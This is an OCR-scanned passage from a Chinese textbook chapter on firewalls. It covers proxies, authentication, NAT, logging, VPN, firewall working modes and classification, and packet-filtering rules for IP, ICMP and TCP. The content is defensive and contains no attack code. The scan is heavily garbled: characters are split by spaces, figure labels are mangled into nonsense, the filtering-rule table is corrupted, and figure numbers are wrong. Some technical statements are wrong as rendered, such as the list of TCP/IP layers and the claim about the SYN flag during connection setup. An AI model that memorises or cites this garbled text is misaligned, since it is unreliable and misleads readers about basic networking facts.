防火 墙 的 访问 控制 采用 两 种 基本 策略 , 即 “ 黑 名 单 " 策 略 和 “ 白 名 单 " 策 略 。“ 黑 名 单 " 策 
略 指 除了 规则 禁止 的 访问 ,其 他 都 是 允许 的 。“ 白 名 单 " 策 略 指 除了 规则 允许 的 访问 ,其 他 都 
是 禁止 的 。 

2. 代理 

代理 技术 是 与 包 过 滤 技 术 截 然 不 同 的 另 一 种 防火 墙 技术 。 这 种 技术 在 防火 墙 处 将 用 户 
的 访问 请 求 变 成 由 防火 墙 代 为 转发 ,外 部 网 络 看 不 见 内 部 网 络 的 结构 ,也 无 法 直接 访问 内 部 
网 络 的 主机 。 在 防火 墙 代 理 服务 中 主要 有 两 种 实现 方式 : 一 是 透明 代理 (Transparent 
proxy) (如 图 4-10 所 示 ) , 指 内 部 网 络 用 户 在 访问 外 部 网 络 的 时 候 , 本 机 配置 不 需要 任何 改 
变 ,防火 墙 就 像 透 明 的 一 样 ; 二 是 传统 代理 ,其 工作 原理 与 透明 代理 相似 ,所 不 同 的 是 它 需 
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要 在 客户 端 设 置 代理 服务 器 。 相 对 于 包 过 滤 技 术 ,代理 技术 可 以 提供 更 加 深入 、 细 致 的 过 
滤 , 甚 至 可 以 理解 应 用 层 的 内 容 , 但 是 实现 复杂 且 速 度 较 慢 。 





透明 代理 
a Very 主要 包括 : 
XRO MRO SEV wm IAV # HTTP 代 理 、FTP 代 理 、TELNET 代 理 、SMP 代 理 、 


POP3 代 理 、SOCKS 代 理 、 自 定义 服务 代理 


@s=-@ @@+ x= 


1 HTTP: Access any to www.sina.com.cn 






r SSEWEIE: fiue 
M E SMTP: ££ Jjsina.com.cn 
RE | KA| w | FE 转发 到 210.72.249.226 
' > SMTP: 附件 不 能 超过 3.0MB 


1 192.168.1.5 


























Sina 服 务 器 


192.168.2.15 


4-10 代理 功能 示意 图 


3. 用 户 身份 认证 

防火 墙 支持 基于 用 户 身 份 的 网 络 访问 控制 ,不 仅 具 有 内 置 的 用 户 管理 及 认证 接口 ,同时 
也 支持 用 户 进行 外 部 身份 认证 。 防 火 墙 可 以 根据 用 户 认证 的 情况 动态 地 调整 安全 策略 , 实 
现 用 户 对 网 络 的 授权 访问 。 防 火 墙 要 对 发 出 网 络 访问 连接 请 求 的 用 户 和 用 户 请 求 的 资源 进 
行 认 证 ,确认 请 求 的 真实 性 和 授权 范围 。 系 统 整体 安全 策略 确定 了 防火 墙 执行 的 身份 认证 
级 别 。 与 此 相应 的 是 ,防火 墙 一 般 支 持 多 种 身份 认证 方案 ,譬如 RADIUS, Kerberos, 
TACACS/TACACS+ .用户 名 十 口令 ,数字 证 书 等 。 用 户 身份 认证 功能 如 图 4-11 所 示 。 

4. 网 络 地 址 转换 

防火 墙 拥 有 灵活 的 地 址 转换 (Network Address Transfer, NAT) 能 力 。 网 络 地 址 转换 
类 型 : 源 地 址 与 目标 地 址 ,动态 与 静态 NAT 分 类 使 用 。 同 时 支持 正 向 ` 反 向 地 址 转换 。 正 
向 地 址 转换 用 于 使 用 保留 IP 地 址 的 内 部 网 用 户 通过 防火 墙 访 问 公 众 网 中 的 地 址 时 对 源 地 
址 进行 转换 ,能 有 效 地 隐藏 内 部 网 络 的 拓扑 结构 等 信息 。 同 时 内 部 网 用 户 共享 使 用 这 些 转 
换 地 址 ,使 用 保留 IP 地 址 就 可 以 正常 访问 公众 网 ,这 有 效 地 解决 了 全 局 IP 地 址 不 足 的 问 
题 ,如 图 4-12 所 示 。 

内 部 网 用 户 对 公众 网 提供 访问 服务 (如 Web E-mail 服务 等 ) 的 服务 器 如 果 保 留 IP 地 址 ， 
或 者 想 隐藏 服务 器 的 真实 IP 地 址 ,都 可 以 使 用 反 向 地 址 转换 来 对 目的 地 址 进行 转换 。 公 众 网 
访问 防火 墙 的 反 向 转换 地 址 ,由 内 部 网 使 用 保留 TP 地 址 的 服务 器 提供 服务 ,同样 既 可 以 解决 
全 局 人 地 址 不 足 的 问题 ,又 能 有 效 地 隐藏 内 部 服务 器 信息 ,对 服务 器 进行 保护 ,如 图 4-13 所 示 。 
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administrator RADIUS 服务 器 


123456 


1 i 将 认证 结果 

防火 墙 将 认证 C Si 

信息 传 给 ' p fe 
RADIUS 服务 器 u | 

' ] 














根据 认证 结果 决定 用 
户 资源 的 访问 权限 
4-11 身份 认证 功能 示意 图 


隐藏 了 内 部 网 络 的 结构 



































bs 
源 地 址 :192.168.0.1 源 地 址 : 101.211.23.1 pb dl 
目的 地 址 : 202.102.93.54 目的 地 址 : 202.102.93.54 Arepa 
| i 
i i 
' i 
IP 报 头 | 数据 多 iP 报头 | 数据 一 
Ud 
ETH2: ETHO0: 
192.168.025 101.211.23.1 101.211.23.2 202.102.93.54 
412 EA NAT 功能 示意 图 
FTP MAIL 
192.168.1.2/24 192.168.1.3/24 


GW: 192.168.1.254 GW: 192.168.1.254 





1. 公开 服务 器 可 以 使 用 私有 地 址 
M DNS 2 隐藏 内 部 网 络 结构 
[SSH 192.168.1424. 9 服务 器 负载 均衡 


GW: 192.168.1.254 
GW: 192.168.1.254 


D 
XWD @@D FEV wa IAD € 


Om- O- @@ + = 


192.168.1.234—_ 








4 MAP 192.168.1.1: 80 To 202.200.40.54:80 
A MAP 192.168. 1 To 202.200.40.54:21 
V] MAP 192.168.1.3: 25 To 202.200.40.54:25 
MAP 192.168.1.4: 53 To 202.200.40.54:53 






ws 


10.10.50.254 





202.200.40.54 


10.10.50.0/24 p a nd 
GW: 10.10.50.254 R 


A 4-13 RA NAT 功能 示意 图 
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5. 日 志 、 报 警 、 分 析 与 审计 

防火 墙 具 有 实时 在 线 监视 内 外 网 络 间 TCP 连接 的 各 种 状态 以 及 UDP 协议 包 能 力 , 用 
户 可 以 随时 掌握 网 络 中 发 生 的 各 种 情况 。 在 日 志 中 记录 : 所 有 对 防火 墙 的 配置 操作 、 上 网 
通信 时 间 、 源 地 址 .目的 地 址 、` 源 端口 .目的 端口 . 字 节 数 . 是 否 人 允许 通过 ; 各 个 应 用 层 命 令 及 
其 参数 ,如 HTTP 请 求 及 其 要 取 的 网 页 名 。 这 些 日 志 信 息 可 以 用 来 进行 安全 性 分 析 ,并 针 
X$ FTP 协议 记录 读 、 写 文件 的 动作 。 新 型 防火 墙 可 以 根据 用 户 的 不 同 需要 对 不 同 的 访问 策 
略 做 不 同 的 日 志 。 例 如 ,有 一 条 访问 策略 允许 外 部 用 户 读 取 FTP 服务 器 上 的 文件 ,从 日 志 
信息 上 用 户 就 可 以 知道 到 底 哪些 文件 被 读 取 了 。 在 线 监 视 和 日 志 信息 还 能 实时 监视 和 记录 
异常 的 连接 ,拒绝 的 连接 、 可 能 的 入侵 等 。 

防火 墙 对 于 所 有 通过 它 的 通信 量 以 及 由 此 产生 的 其 他 信息 要 进行 记录 ,并 提供 日 志 管 
理 和 存储 方法 。 具 体内 容 如 下 (如 图 4-14 所 示 ) 。 

















4-14 日 志 分 析 功 能 示意 图 


O 自动 报表 ,日 志 报告 书写 器 : 防火 墙 实现 报表 自动 化 输出 和 日 志 报告 功能 。 

O 简要 列表 : 防火 墙 按 要 求 进行 报表 分 类 打印 的 功能 。 

© 自动 日 志 扫描 : 防火 墙 的 日 志 自 动 分 析 和 扫描 功能 。 

CD 图 表 统 计 : 防火 墙 进行 日 志 分 析 后 以 图 形 方式 输出 统计 结果 。 

报警 机 制 是 在 发 生 违 反 安全 策略 的 事件 后 ,防火 墙 向 管理 员 发 出 提示 通知 的 机 制 , 各 种 
现代 通信 手段 都 可 以 使 用 ,包括 E-mail MEHL, FALSE. 

分 析 与 审计 机 制 可 用 于 监控 通信 行为 分 析 日 志 情况 ,进而 查 出 安全 漏洞 和 错误 配置 ， 





以 完善 安全 策略 。 
防火 墙 的 日 志 记录 量 往往 比较 大 ,通常 将 日 志 存 储 在 一 台 专 门 的 日 志 服 务 器 上 。 
6. 虚拟 专用 网 


虚拟 专用 网 (VPN) 在 不 安全 的 公共 网 络 ( 如 Internet) 上 建立 一 个 逻辑 的 专用 数据 网 络 
来 进行 信息 的 安全 传递 ,目前 已 经 成 为 在 线 交 换 信息 的 最 安全 的 方式 之 一 。 但 是 传统 的 防 
火 墙 不 能 对 VPN 的 加 密 连 接 进行 解密 检查 ,所 以 是 不 允许 VPN 通信 通过 的 ,VPN 设备 也 
是 作为 单独 产品 出 现 的 。 现 在 越 来 越 多 的 厂家 将 防火 墙 和 VPN 集成 在 一 起 ,将 VPN 作为 
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防火 墙 的 一 种 新 的 技术 配置 。 多 数 防 火 墙 支持 VPN 加 密 标准 ,并 提供 基于 





F 硬件 的 加 密 , 这 


使 得 防火 墙 速度 不 减 而 功能 更 加 合理 ,如 图 4-15 所 示 。 


管理 主机 10.10.17.200 






































GW 10.10.17.250 证 书 管理 系统 
LJ = 应 用 服务 器 
总 部 子 网 = 
10.10.17.0/24 
220.168.17.2 
10.10.17.250 
Z 
r3 GW: 220.168.17.1 
= 7 
域名 管理 系统 n » 
211.211.18.3 / Internet ^ - 
£ ll. 
" f T 
741 PSTN^-- 
£ x aag R 
ADSD, 客户 端 
ADSL Modem| 桥 接 方式 \、` 
分 支 ^: FWID: 1q2aw3zse4xdr5cf | ADSL Modem | NAT 方 式 
192.168. 192.168.1.254 x 
` 
ax i š 
dr 
2, 2.0/2. 
192.168.2024 T] [E] 12.162200 
管理 主机 192.168.1.100 一 
GW: 192.168.1.254 
4-15. VPN 功能 示意 图 


7. 管理 功能 

防火 墙 的 管理 功能 是 将 防火 墙 设备 与 系统 整 
并 相互 配合 ,协调 工作 的 功能 ,是 实现 一 体 化 安全 

一 般 说 来 ,防火 墙 的 管理 包括 下 列 几 个 方面 。 

CD. 根据 网 络 安全 策略 编制 防火 墙 过 滤 规 则 。 


体 安 全 策略 下 的 其 他 安全 设备 联系 到 一 起 
必 不 可 少 的 要 素 。 


@ 配置 防火 墙 运行 参数 。 可 以 通过 本 地 Console 口 配置 .基于 不 同 协议 的 远程 网 络 化 


© 实现 防火 墙 日 志 的 自动 化 管理 。 就 是 实现 日 志文 件 的 记录 、 转 存 ` 分 析 、 再 配置 等 过 


配置 等 方式 进行 。 
程 的 自动 化 和 智能 化 。 

@ 防火 墙 的 性 能 管理 。 包 括 动态 带宽 管理 、 
地 或 者 远程 多 种 方式 实现 。 

8. 其 他 功能 


负载 均衡 .失败 恢复 等 技术 ,也 可 以 通过 本 


Q) 流量 控制 。 流 量 控制 功能 如 图 4-16 所 示 。 
(2) IP-MAC 绑 定 。IP 和 MAC 绑 定 功能 如 图 4-17 所 示 。 
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销售 组 





4-36 流量 控制 功能 示意 图 


00-50-04-BB-71-A6 00-50-04-BB-71-BC 
199.168.1.3 
199.168.1.2 192.168.1.2 192.168.1.4. 192.168.1.5 
EE 机 A — quB 主机 C ED 

















IP 与 MAC 地 址 绑 定 后 ， 不 允许 | 
主机 B 假 冒 主机 A 的 IP 地 址 上 网 


防火 墙 允许 主机 A 上 网 


图 417 IP 和 MAC 绑 定 功能 示意 图 


第 4 章 防火 墙 技术 149 





4.2.4 防火 墙 工作 模式 


当 防 火 墙 位 于 内 部 网 络 和 外 部 网 络 之 间 时 ,需要 将 防火 墙 与 内 部 网 络 、 外 部 网 络 以 及 
DMZ 3 个 区 域 相 连 的 接口 分 别 配置 成 不 同 网 段 的 IP 地 址 ,重新 规划 原 有 的 网 络 拓扑 ,此 时 
相当 于 一 台 路 由 器 。 采 用 路 由 模式 时 ,可 以 完成 ACL 包 过 滤 、ASPF 动态 过 滤 、NAT 转换 
等 功能 ,如 图 4-18 所 示 。 


199.168.1.2 199.168.1.3 199.168.1.4 199.168.1.5 


I 
! 主机 A ”主机 B REC ”主机 D 
i 

| N 

' 

i 

! 默认 网 关 =199.168.1.8 sd 受 保护 网 络 
i 

' 

i 

' 

i 

' 

i 

' 

i 

1 

i 

' 

i 





199.168.1.8 


------- -— 简单 的 E 
防火 墙 相当 于 一 个 提供 简单 的 路 由 功能 


» 
简单 的 路 由 器 203.12.34.56 


203.12.34.57 | 199.168.1.8 
SEE 


图 4-18 路 由 模式 示意 图 
透明 模式 ,顾名思义 ,首要 的 特点 就 是 对 用 户 是 透明 的 (Transparent) , 即 用 户 意识 不 到 
防火 墙 的 存在 。 要 想 实 现 透明 模式 ,防火 墙 必 须 在 没有 TP 地 址 的 情况 下 工作 ,不 需要 对 其 
设置 IP 地 址 ,用 户 也 不 知道 防火 墙 的 IP 地 址 ,如 图 4-19 所 示 。 


















Ee E E E EP E E 2 
! 199.168.12 199.168.13 199.168.1.4 199.168.1.5 i 

' 主机 A ”主机 B ”主机 C MD | 

' ' 

! ' 

' 

| 默认 网 关 -19916818 — runas O 

i Switch 1 

Tm 一 ~、、 bmi ! 

| ~à 
o = 

| 防火 墙 相当 于 网 桥 ， E | 

| 原 网 络 结构 没有 改变 — 2-777 ! 

全 透明 模式 下 ; 里 了 199.168.1.8 | 
LL 不 用 配置 [p 地 址 “| R ERN 
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图 4-19 透明 模式 示意 图 
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如 果 防 火 墙 既 存在 工作 在 路 由 模式 的 接口 (接口 具有 IP 地 址 ) ,又 存在 工作 在 透明 模式 
的 接口 (接口 无 IP 地 址 ), 则 防火 墙 工 作 在 混合 模式 下 (如 图 4-20 所 示 )。 混 合 模式 主要 用 
于 透明 模式 作 双 机 备份 的 情况 ,此 时 启动 VRRP(Virtual Router Redundancy Protocol. 虚 
拟 路 由 元 余 协 议 ) 功 能 的 接口 需要 配置 IP 地 址 ,其 他 接口 不 配置 IP 地 址 。 


两 接口 在 不 同 网 段 ， 
防火 墙 处 于 路 由 模式 


ETH2: JUD 192.168.7.0/24 | El 
-é 两 接口 在 同一 网 段 ， 
两 接口 在 不 同 网 段 ， 防火 墙 处 于 透明 模式 


防火 墙 处 于 路 由 模式 


此 时 整个 防火 墙 工作 于 透明 + 路 由 模 
式 ， 称 之 为 综合 模式 或 者 混合 模式 


192.168.7.0/24 网 段 


图 4-20 混合 模式 示意 图 


202.11.22.1/24 网 段 










ETH1: 202.11.22.2 











4.2.5 防火 墙 的 分 类 


目前 市 场 上 的 防火 墙 产品 非常 多 ,划分 标准 也 比较 复杂 。 主 要 分 类 如 下 。 
(1) 从 软 硬 件 形式 上 分 ,可 分 为 软件 防火 墙 、 硬 件 防 火 墙 以 及 芯片 级 防火 墙 3 种 类 别 ， 
如 图 4-21 所 示 。 
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4-21 软件 防火 墙 和 硬件 防火 墙 示意 图 
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软件 防火 墙 运行 于 特定 的 计算 机 上 ,需要 用 户 预 先 安装 好 的 计算 机 操作 系统 支持 ,一 般 
来 说 这 台 计 算 机 就 是 整个 网 络 的 网 关 , 俗 称 " 个 人 防火 墙 >。 软 件 防 火 墙 需要 先 在 计算 机 上 
安装 并 做 好 配置 才 可 以 使 用 。 

硬件 防火 墙 基于 PC 架构 。PC 架构 计算 机 上 运行 一 些 经 过 简化 的 操作 系统 ,最 常用 的 
是 Linux 系统 。 此 类 防火 墙 采用 Linux 系统 的 内 核 , 其 安全 性 会 受到 操作 系统 本 身 的 影响 。 
硬件 防火 墙 一 般 至 少 应 具备 3 个 端口 ,分 别 接 内 网 、 外 网 和 DMZ 区 。 

芯片 级 防火 墙 基于 专门 的 硬件 平台 ,没有 操作 系统 。 专 有 的 ASIC 芯片 促使 它们 比 其 
他 种 类 的 防火 墙 速度 更 快 ,处 理 能 力 更 强 , 性 能 更 高 。 这 类 防火 墙 由 于 是 专用 操作 系统 , 因 
此 防火 墙 本 身 的 漏洞 比较 少 ,不 过 价格 相对 比较 高 。 

(2) 从 防火 墙 技术 上 分 ,可 分 为 “" 包 过 滤 型 ”和 "应 用 代理 型 ?两 大 类 。 

(3) 从 防火 墙 结构 上 分 ,可 分 为 单一 主机 防火 墙 . 路 由 器 集成 式 防火 墙 和 分 布 式 防 火 墙 
3 种 。 

(4) 按 防火 墙 的 应 用 部 署 位 置 分 ,可 为 边界 防火 墙 \ 个 人 防火 墙 和 混合 防火 墙 三 大 类 ， 
如 图 4-22 所 示 。 

(5) 按 防 火 墙 的 性 能 分 ,可 分 为 百 兆 级 防火 墙 和 千 兆 级 防火 墙 两 大 类 。 
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4-22 网络 防火 墙 和 个 人 防火 墙 示意 图 


4.3 防火墙 的 关键 技术 


第 一 代 防 火 墙 技术 几乎 与 路 由 器 同时 出 现 . 采 用 了 包 过 滤 (Packet Filtering) ER. 
1989 年 ,贝尔 实验 室 同时 推出 了 第 二 代 电 路 层 防 火 墙 和 第 三 代 应 用 层 防火 墙 (代理 防火 
Ki). 1992 年 ,USC 信息 科学 院 提 出 了 基于 动态 包 过 滤 (Dynamic Packet Filtering) TER ff 
第 四 代 状 态 监测 (Stateful Inspection) 防火 墙 。1998 4E. NAI 公司 推出 了 基于 自 适应 代理 
(Adaptive Proxy) 技 术 的 第 五 代 防 火 墙 。 下 一 代 防 火 墙 (NextrGeneration Firewall, NGFW), 除 
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了 具备 传统 防火 墙 的 功能 外 ,还 包括 线 上 深度 封包 检测 (DPI)、 和 人 侵 预 防 系 统 (IPS) .应 用 层 
侦 测 与 控制 .SSL/SSH 检测 、 网 站 过 滤 以 及 QoS/ 带宽 管理 等 功能 ,使 得 这 个 系统 能 够 全 面 
应 对 应 用 层 威胁 。 

总 体 来 讲 , 防 火 墙 技术 可 分 为 “ 包 过 滤 型 ?和 "* 应 用 代理 型 ?两 大 类 。 


4.3.1 包 过 滤 技术 


1. 包 过 滤 基 本 概念 

包 过 滤 技 术 是 最 基本 的 访问 控制 技术 , 它 的 作用 是 执行 边界 访问 控制 功能 , 即 对 网 络 通 
信 数 据 进行 过 滤 。 具 体 地 说 ,过 滤 就 是 使 符合 预先 按照 组 织 的 网 络 安全 策略 制定 的 安全 过 
滤 规 则 的 数据 包 通过 ,拒绝 那些 不 符合 安全 过 滤 规 则 的 数据 包 通过 ,并 且 根 据 预先 的 定义 执 
行 记录 该 信息 ,发 送 报警 信息 给 管理 人 员 等 操作 。 

包 过 滤 也 称 为 分 组 过 滤 , 包 过 滤 技 术 的 工作 对 象 是 数据 包 。 两 台 计算 机 进行 TCP/IP 
通信 ,将 要 传递 的 数据 拆 分 成 一 个 一 个 的 数据 分 组 ,并 且 按 照 规则 发 送 这 些 分 组 。 为 了 保证 
这 些 分 组 正确 传递 到 接收 方 并 且 重新 组 织 成 原始 报 文 , 应 在 每 个 数据 分 组 的 前 面 增加 一 些 
额外 的 信息 以 供 中 间 节 点 和 目的 节点 进行 判断 。 这 些 添加 了 额外 信息 的 数据 分 组 称 为 数据 
包 , 增 加 的 额外 信息 称 为 数据 包 包 头 ,数据 分 组 称 为 包 内 的 数据 载荷 ,而 拆 分 数据 ,数据 包头 
的 格式 及 传递 和 接收 数据 包 所 要 遵循 的 规则 就 是 网 络 协议 。 

对 TCP/IP 族 来 说 , 包 过 滤 技 术 主 要 是 对 数据 包 的 包头 的 各 个 字段 进行 操作 ,包括 源 
IP 地址 .目的 IP 地 址 、 数 据 载荷 协议 类 型 IP 选项 、 源 端口 .目的 端口 .TCP 选项 及 数据 包 
传递 的 方向 等 信息 。 包 过 滤 技 术 根 据 这 些 字 段 的 内 容 , 以 安全 过 滤 规 则 为 评判 标准 ,来 确定 
是 否 允 许 数据 包 通 过 。 

安全 过 滤 规 则 是 包 过 滤 技 术 的 核心 ,是 组 织 的 整体 安全 策略 中 网 络 安全 策略 部 分 的 直 
接 体现 。 安 全 过 滤 规 则 集 就 是 访问 控制 列表 ,该 表 的 每 一 条 记录 都 明确 定义 了 对 符合 记录 
条 件 的 数据 包 所 要 执行 的 动作 一 一 允许 通过 或 者 拒绝 通过 ,其 中 的 条 件 则 是 对 上 述 数据 包 
包头 的 各 个 字段 内 容 的 限定 。 

包 过 滤 技 术 必 须 在 操作 系统 的 协议 栈 处 理 数据 包 之 前 拦截 数据 包 , 即 防火 墙 要 在 数据 
包 进入 系统 之 前 处 理 它 。 由 于 数据 链 路 层 和 物理 层 的 功能 是 由 网 卡 完成 的 ,这 以 上 各 层 协 
议 的 功能 由 操作 系统 实现 ,所 以 说 实现 包 过 滤 技 术 的 防火 墙 模块 应 该 被 设置 在 操作 系统 协 
议 栈 的 网 络 层 之 下 ,数据 链 路 层 之 上 的 位 置 。 包 过 滤 技 术 的 具体 实现 如 图 4-23 所 示 。 

实现 包 过 滤 技术 的 防火 墙 模块 首先 要 做 的 是 将 数据 包 的 包头 部 分 剥离 。 然 后 ,根据 访 
问 控制 列表 的 顺序 ,将 包头 的 各 个 字段 的 内 容 与 安全 过 滤 规 则 进行 逐条 比较 判断 。 这 个 过 
程 一 直 持续 到 找到 一 条 相符 的 安全 过 滤 规 则 为 止 ,接着 按照 安全 过 滤 规 则 的 定义 执行 相应 
的 动作 。 如 果 没 有 相符 的 安全 过 滤 规 则 ,就 执行 防火 墙 默认 的 安全 过 滤 规 则 。 

为 了 保证 对 受 保护 网 络 能 够 实施 有 效 的 访问 控制 ,执行 包 过 滤 功 能 的 防火 墙 应 该 被 部 
署 在 受 保护 网 络 或 主机 和 外 部 网 络 的 交界 点 上 。 在 这 个 位 置 上 可 以 监控 到 所 有 的 进出 数 
据 ,从 而 保证 了 不 会 有 任何 不 受 控制 的 旁 路 数据 出 现 。 

2. 包 过 滤 防 火 墙 

包 过 滤 防 火 墙 工作 在 OSI 网 络 参考 模型 的 网 络 层 , 它 根 据 数据 包头 源 地 址 .目的 地 址 、 
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图 4-23” 包 过 滤 技 术 的 实现 示意 图 


源 端 口号 、 目 的 端口 号 和 协议 类 型 等 标志 确定 是 否 允 许 通过 。 只 有 满足 过 滤 条 件 的 数据 包 
才 被 转发 到 相应 的 目的 地 ,其 余数 据 包 则 被 从 数据 流 中 丢弃 。 包 过 滤 防 火 墙 工作 原理 如 
图 4-24 所 示 。 
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424 包 过 滤 防 火 墙 工作 原理 示意 图 


包 过 滤 技 术 是 一 种 通用 、 廉 价 和 有 效 的 安全 手段 。 之 所 以 通用 ,是 因为 它 适 用 于 所 有 网 
络 服务 : 之 所 以 廉价 ,是 因为 大 多 数 路 由 器 都 提供 数据 包 过 滤 功能 ,所 以 这 类 防火 墙 多 数 是 
由 路 由 器 集成 的 ; 之 所 以 有 效 ,是 因为 它 能 在 很 大 程度 上 满足 绝 大 多 数 企业 的 安全 要 求 。 

第 一 代 静 态 包 过 滤 防 火 墙 (如 图 4-25 所 示 ) 是 根据 定义 好 的 过 滤 规 则 审查 每 个 数据 包 ， 
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以 便 确定 其 是 否 与 某 一 条 包 过 滤 规 则 匹配 。 过 滤 规 则 基于 数据 包 的 报头 信息 进行 制定 ,如 
表 4-4 所 示 。 报 头 信息 中 包括 IP 源 地 址 和 目的 地 址 、 传 输 协 议 (TCP、UDP ICMP 等 )、 
TCP/UDP 源 端口 和 目标 端口 等 。 
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服务 器 服务 器 
图 4-25 ”静态 包 过 滤 防 火 墙 示意 图 


表 4-4 防火 墙 过 滤 规 则 表 





规则 编号 ”通信 方向 ”协议 类 型 源 IP 目标 IP 源 端口 目标 端口 操 作 
A 3 TCP 外 部 内 部 221024 25 允许 
B 出 TCP 内 部 外 部 25 三 1024 允许 
[e H TCP 内 部 外 部 2:1024 25 允许 
D 进 TCP 外 部 内 部 25 21024 允许 
E 两 者 任意 任意 任意 任意 任意 拒绝 


包 过 滤 技 术 的 报头 信息 过 滤 具 体 流程 如 图 4-26 所 示 。 

3. 数据 包 过 滤 的 具体 作用 

TCP/IP 协议 族 遵 守 一 个 4 层 的 参考 模型 ,包括 数据 接口 层 、 物 理 层 、 传 输 层 和 应 用 层 。 
下 面 分 析 数 据 包 过 滤 在 各 层 协 议 中 的 具体 作用 。 

CD 针对 IP 的 过 滤 。 查 看 每 个 IP 数据 包 的 包头 ,将 包头 数据 与 规则 集 相 比较 ,转发 规 
则 集 允 许 的 数据 包 ,拒绝 规则 集 不 允许 的 数据 包 。 

针对 IP 的 过 滤 操 作 可 以 设 定 对 源 IP 地 址 进行 过 滤 ,只 人 允许 受信 任 的 主机 访问 网 络 资 
源 而 拒绝 一 切 不 可 信和 的 主机 的 访问 。 

针对 IP 的 过 滤 操 作 可 以 设 定 对 目的 IP 地 址 进行 过 滤 ,这 种 安全 过 滤 规 则 的 设 定 用 于 
保护 目的 主机 或 网 络 ; 只 允许 外 部 主机 访问 屏蔽 子 网 中 的 服务 器 , 绝 不 允许 外 部 主机 访问 
内 部 网 络 ; 设 定 外 部 主机 到 屏蔽 子 网 内 的 服务 器 的 访问 规则 。 

(2) 针对 ICMP 的 过 滤 。 阻 止 存在 泄露 用 户 网 络 敏感 信息 的 危险 的 ICMP 数据 包 进 出 
网 络 ; 拒绝 所 有 可 能 会 被 攻击 者 利用 .对 用 户 网 络 进行 破坏 的 ICMP 数据 包 。 

类 型 8 的 ICMP 询问 报 文 , 攻 击 者 可 以 利用 这 样 的 报 文 探测 用 户主 机 和 设备 的 可 达 性 ， 
勾画 出 用 户 网 络 的 拓扑 结构 。 设 定安 全 策略 ,阻止 类 型 8 回 送 请 求 ICMP 报 文 进出 用 户 
网 络 。 
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4. 应 用 层 控制 很 弱 
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分 组 过 滤 也 称 为 包 过 滤 。 分 组 过 滤 
防火 墙根 据 数据 包头 信息 对 网 络 流 
量 进 行 处 理 











HTTP DNS 
4-26 包 过 滤 技 术 的 报头 信息 过 滤 具 体 流 程 示意 图 


类 型 0 回 送 应 答 ICMP 报 文 ,攻击 者 恶意 地 将 大 量 的 类 型 8 的 ICMP 报 文 发 往 用 户 网 
络 ,使 得 目标 主机 疫 于 接受 这 些 垃圾 数据 而 不 能 提供 正常 的 服务 。 设 定安 全 策略 ,阻止 类 型 
0 回 送 应 答 ICMP 报 文 进出 用 户 网 络 。 

类 型 5 的 路 由 重 定向 ICMP 报 文 ,攻击 者 采用 中 间 人 攻击 方法 ,伪装 成 预期 的 接收 者 截 
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获 或 自 改 正常 的 数据 包 , 也 可 以 将 数据 包 导 向 其 控制 的 未 知 网 络 。 设 定安 全 策略 ,阻止 类 型 
5 路 由 重 定向 ICMP 报 文 进出 用 户 网 络 。 

类 型 3 的 目的 不 可 达 ICMP 报 文 ,攻击 者 可 以 通过 这 些 报 文 探 知 用 户 网 络 的 敏感 信息 。 

(3) 针对 TCP 的 过 滤 。 常 见 的 针对 TCP 过 滤 为 端口 过 滤 和 对 标志 位 的 过 滤 。 

CD 可 以 设 定 对 源 端口 或 者 目的 端口 的 过 滤 , 称 为 端口 过 滤 或 者 协议 过 滤 。 通 常 
HTTP,FTP,SMTP 等 提供 的 服务 都 在 一 些 常用 端口 上 实现 ,针对 这 些 端口 号 设置 过 滤 规 
则 ,就 可 以 实现 针对 特定 服务 的 控制 规则 ,如 拒绝 内 部 主机 到 某 外 部 W W W 服务 器 的 80 号 
端口 的 连接 即 可 实现 禁止 内 部 用 户 访问 该 外 部 网 站 。 

Q 可 以 设 定 对 标志 位 的 过 滤 。 两 个 网 络 节 点 之 间 如 果 存 在 基于 TCP 的 通信 ,那么 一 
定 存在 着 至 少 一 个 会 话 。 会 话 总 是 从 连接 建立 阶段 开始 ,TCP 连接 建立 过 程 就 是 三 次 握手 
过 程 。 在 这 个 过 程 中 ,TCP 报 文 头 部 的 一 些 标志 位 的 变化 需要 注意 以 下 几 点 。 

a， 当 连接 的 发 起 者 发 出 连接 请 求 时 , 它 发 出 的 报 文 SYN 位 为 1 而 包括 ACK 位 在 内 的 
其 他 标志 位 为 0。 该 报 文 携带 发 起 者 自行 选择 的 一 个 通信 初始 序号 。 

b. 当 连 接 请 求 的 接收 者 接受 该 连接 请 求 时 , 它 将 返回 一 个 连接 应 答 报 文 。 该 报 文 的 
SYN 位 为 1 而 ACK 位 为 1。 该 报 文 不 但 携带 对 发 起 者 通信 初始 序号 的 确认 (加 1) ,而 且 携 
带 接收 者 自行 选择 的 另 一 个 通信 初始 序号 ,如 果 接 收 者 拒绝 该 连接 请 求 , 则 返回 的 报 文 
RST 位 置 1 。 

c. 连接 的 发 起 者 还 需要 对 接收 者 自行 选择 的 通信 初始 序列 号 进行 确认 ,返回 该 值 加 1 
作为 希望 接收 的 下 一 个 报 文 的 序号 ,同时 ACK 位 置 1。 

在 连接 请 求 的 过 程 中 ,SYN 位 始终 为 0。 只 要 对 SYN=1 报 文 进 行 操作 , 即 可 以 实现 
对 连接 会 话 的 控制 。 拒 绝 这 类 报 文 相当 于 阻 断 了 通信 连接 的 建立 。 

(4) 针对 UDP 的 过 滤 。 这 里 讲 的 包 过 滤 技 术 是 指 静 态 包 过 滤 技 术 , 它 只 针对 包 本 身 进 
行 操作 ,而 不 记录 通信 过 程 的 上 下 文 ,也 就 无 法 从 独立 的 UDP 用 户 数据 包 获 得 必要 的 信 
息 。 针 对 UDP 的 过 滤 , 要 么 阻塞 某 个 端口 ,要 么 听 之 任 之 。 

4. 包 过 滤 防火 墙 的 优点 和 缺点 

包 过 滤 防 火 墙 的 优点 是 不 用 改动 客户 机 和 主机 上 的 应 用 程序 ,因为 它 工作 在 网 络 层 和 
传输 层 ,与 应 用 层 无 关 。 

1) 包 过 滤 防 火 墙 的 优点 

(1) 处 理 包 的 速度 比 代 理 服务 器 快 ,过 滤 路 由 器 为 用 户 提供 了 一 种 透明 的 服务 ,用 户 不 
用 改变 客户 端 程序 或 改变 自己 的 行为 。 

(2) 实现 包 过 滤 几 乎 不 再 需要 费用 (或 极 少 的 费用 ), 因 为 这 些 特点 都 包含 在 标准 的 路 
由 器 软件 中 。 

(3) 包 过 滤 路 由 器 对 用 户 和 应 用 来 讲 是 透明 的 。 

(4) 帮助 保护 整个 网 络 ,减少 暴露 的 风险 。 

2) 包 过 滤 防 火 墙 的 缺点 

CD 包 过 滤 防 火 墙 的 维护 比较 困难 ,数据 包 过 滤 规 则 难以 配置 ,因为 网 络 管理 员 需 要 深 
